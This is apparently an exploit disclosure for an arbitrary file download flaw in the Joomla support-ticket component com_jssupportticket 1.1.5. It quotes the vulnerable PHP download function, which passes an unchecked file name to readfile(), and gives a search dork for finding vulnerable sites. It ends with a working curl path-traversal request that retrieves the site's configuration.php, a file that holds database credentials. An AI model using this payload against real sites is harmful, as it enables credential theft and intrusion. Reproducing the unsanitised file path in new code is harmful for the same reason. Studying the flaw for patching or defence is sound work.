#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download #Dork: inurl:"index.php?option=com_jssupportticket" #Date: 08.08.19 #Exploit Author: qw3rTyTy #Vendor Homepage: http://joomsky.com/ #Software Link: https://www.joomsky.com/46/download/1.html #Version: 1.1.5 #Tested on: Debian/nginx/joomla 3.9.0 ##################################### #Vulnerability details: ##################################### Vulnerable code is in line 1411 in file admin/models/ticket.php 1382 function getDownloadAttachmentByName($file_name,$id){ 1383 if(empty($file_name)) return false; 1384 if(!is_numeric($id)) return false; 1385 $db = JFactory::getDbo(); 1386 $filename = str_replace(' ', '_',$file_name); 1387 $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id; 1388 $db->setQuery($query); 1389 $foldername = $db->loadResult(); 1390 1391 $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory'); 1392 $base = JPATH_BASE; 1393 if(JFactory::getApplication()->isAdmin()){ 1394 $base = substr($base, 0, strlen($base) - 14); //remove administrator 1395 } 1396 $path = $base.'/'.$datadirectory; 1397 $path = $path . '/attachmentdata'; 1398 $path = $path . '/ticket/' . $foldername; 1399 $file = $path . '/' . $filename; 1400 1401 header('Content-Description: File Transfer'); 1402 header('Content-Type: application/octet-stream'); 1403 header('Content-Disposition: attachment; filename=' . basename($file)); 1404 header('Content-Transfer-Encoding: binary'); 1405 header('Expires: 0'); 1406 header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); 1407 header('Pragma: public'); 1408 header('Content-Length: ' . filesize($file)); 1409 //ob_clean(); 1410 flush(); 1411 readfile($file); //!!! 1412 exit(); 1413 exit; 1414 } ##################################### #PoC: ##################################### $> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"